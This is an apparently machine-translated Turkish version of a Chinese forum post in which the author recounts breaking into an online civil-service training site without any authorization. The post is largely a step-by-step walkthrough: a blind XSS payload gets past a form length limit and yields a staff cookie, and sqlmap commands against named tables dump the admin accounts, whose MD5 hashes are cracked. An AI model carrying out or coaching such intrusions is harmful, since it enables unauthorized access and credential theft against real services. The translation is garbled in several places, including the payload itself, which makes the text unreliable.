1. Neden
emmm, kavurucu yaz geldi, böyle bir sauna günü için ne güzel?
Evet, evde oturmalı, klimayı üflemeli, karpuz yemeli ve sonra sessizce bir çukur kazmalısın. Bir çukur kazdıktan ve paket yemek sipariş ettikten, bira içtikten ve mangal yedikten sonra güzel değil mi? Ancak bu bilge kişinin yolu olabilir, ancak bu, laik için zordur. . . Yaz saplantısına kapılırken sevgili annem aniden bana bir dizi ölümcül çağrı yaptı.
Genel içerik aşağıdaki gibidir:
--Anne: Oğlum ~ Evet. . . Devlet memuru eğitimi veren kurum olan mahremiyeti yazdırıyorsunuz (biliyor musunuz), internete bakmama yardım edin, memurluk sınavına girmek isteyen bir arkadaşım var ~
--Me: (kalbimde sırıtarak ses çıkarır) Oh, bu bia tanrı, evde uyumak sorun değil. . Yapma. .
--Anne: MLGB, düzeltmeni söyle, acele et ve gece beni ara.
Hey, ailemin emirleri ihlal edilemez, ne yazık ki elime sadece klavye ve kavunları bırakıp Baidu'da eğitim kurumları aramaya başlayabiliyorum.
Baidu'da uzun süre aradıktan sonra uygun bir tane bulamadım. Çevremdeki arkadaşlarıma sordum: Arkadaşım çevrimiçi bir okul kayıt adresi verdi
http: //***.com/3g/***/2203947.htm
Evet, ücretsiz deneme dersleri de dahildir. . . Gerçekten gelişmiş. . . .
Bununla birlikte, meslek eğitimi veren bir ilkokul öğrencisi olarak, bu tür çevrimiçi okullarda eğitimin kalitesine nasıl güvenebilir? Ben de aşk istasyonunu açtım ve ağırlıklara baktım. . .
Bu Nima mı? ? ? Baidu sağ 6, emmm, biraz ilginç. Böylesine ağır bir siteyi gördüğümde, o zamanlar zaten aç ve susamıştım, bu yüzden bu sitede bir penetrasyon testi dalgası yapmaya karar verdim.
2. XSS kör yazma? Düzenle
Bunu görünce arkadaşlarım düşünmeli. . . emm, XSS ile deneyebilir miyim? (Sözde kör yazma, arka planda giriş bilgilerinin çıktı konumunu bilmeden sızma testi gerçekleştirmek için XSS kodunu kullanmaktır). . . Ardından, xss yükünü eklemeyi deneyin. . .
Yük: < / textarea > < script src = "=" " > < /senaryo >
Yükü yalnızca şekilde gösterildiği gibi yapıştırın < / tex şu dört karakteri
İnceleme öğesine bakın, form işlemede maksimum uzunluğu ayarlayın, yalnızca öğe yöntemini doğrudan gözden geçirin ve değiştirin.
Maksimum uzunluğu 999 olarak düzenleyin
Ardından XSS Payload'ımız forma normal olarak girilebilir
Cep telefonunun metin kutusuna rastgele 11 haneyi doldurdum ve gönder düğmesine tıkladım. Neyse ki gönderim başarılı oldu (arka uç içeriği doğrulamadı)
Yaklaşık bir saat sonra birden heyecanla XSS platformundan bir e-posta geldi. . . (Müşteri hizmetleri gerçekten adanmıştır)
Bir çerez tutarak, bir göz atma dalgası için arka plana gittim ve iznin çok küçük olduğunu ve temelde yalnızca müşteri hizmetleri işini ele aldığını gördüm.
Ancak yönetici hesabını arka planda görüntüleyebilirsiniz. . . . . (Elbette, büyük bir istasyon ve arka plandaki iş bölümü çok mükemmel ...)
Pek çok süper yönetici hesabına bakıyorum, ancak ben sadece izinsiz bir müşteri hizmetiyim ve kendimi gerçekten rahatsız hissediyorum. .
Sızmamız burada sona mı eriyor? ? İmkansız, bu kesinlikle Ben'in tarzına uygun değil. . .
Bu yüzden, bir gösteri operasyonu dalgası için bir yer olup olmadığını görmek için kulis boyunca dikkatlice gezindim. . .
3. Arka planda SQL enjeksiyonu? Dikkat et
Müşteri hizmetleri işleme arayüzümüzün sorgulanabildiğini görebilirsiniz. Sorgu işlemi, sorguyu elde etmek için GET aracılığıyla bir mobil parametrenin iletilmesidir.
Herhangi bir enjeksiyon olup olmadığını görmek için SQL enjeksiyonunun yükünü doğrudan test edelim. Sayfanın bilgi döndürmediği, ardından SQL enjeksiyonu olasılığı olduğu tespit edildi.
Orijinal HTTP isteğini almak ve C: \ Users \ Samsung 700Z5C \ Desktop \ 1.txt dosyasına kaydetmek için BurpSuite kullanıyoruz.
Ardından, bu HTTP isteğini enjekte etmek için SQLMAP'nin -r parametresini kullanarak büyük bir heyecan anıdır.
Komut, sqlmap -r C: \ Users \ Samsung 700Z5C \ Desktop \ 1.txt şeklindedir.
vay, vay ~ Enjeksiyon başarılı oldu. Hahaha. . . . Doğrudan yöneticinin masasına gitmeye başladık
Komut, sqlmap -r C: \ Users \ Samsung 700Z5C \ Desktop \ 1.txt --tables -D "nd_net" // nd_net veritabanının tablolarını listeleyin
Sonra çalıştır
sqlmap -r C: \ Users \ Samsung 700Z5C \ Desktop \ 1.txt --columns -T "net_admin_user" -D "nd_net" // net_admin_user tablosunun alanlarını listeleyin
Sonunda komutu yürütün
sqlmap.py -r "I: \ T00l \ 1.txt" --dump -C "id, nd_user, kullanıcı kimliği, nd_pass" -T "net_admin_user" -D "nd_net" --threads = 10
// id, nd_user, userid, nd_pass verilerini net_admin_user tablosunda dışa aktarın
Hepsi md5 şifrelemedir, cmd5 alır, bir şifre çözme dalgasıdır, tüm yönetici hesabı şifrelerini başarıyla alın ve ardından yönetici ayrıcalıklarıyla arka planda oturum açmak için başarıyla oturum açın
Haha, dikkat et!
4. Kabuksuz, tuzlu balığın farkı nedir?
Altı, biraz düşünce
Bu tür yazıları her yazdığımda biraz yorgun hissetmeme rağmen, teknolojiyi sizinle paylaşmayı ve birlikte ilerlemeyi düşündüğümde, kalbimde hep bir alev yanar.Böyle çok yol bana eşlik eden arkadaşlarıma teşekkürler, öyle kalıcı olsun Silinmez tutku
Ben de garnitürüm, makale ile ilgili herhangi bir sorun varsa, lütfen beni zamanında düzeltin!
Not: Bitmiş kod denetim aracım RIPS'i de destekleyebilirsiniz (aslında, sadece bir sihirli madeni para dalgası çekmek istiyorum)
Yeniden basıldı: https://bbs.ichunqiu.com/thread-42989-1-1.html
Yazar i id: J0o1ey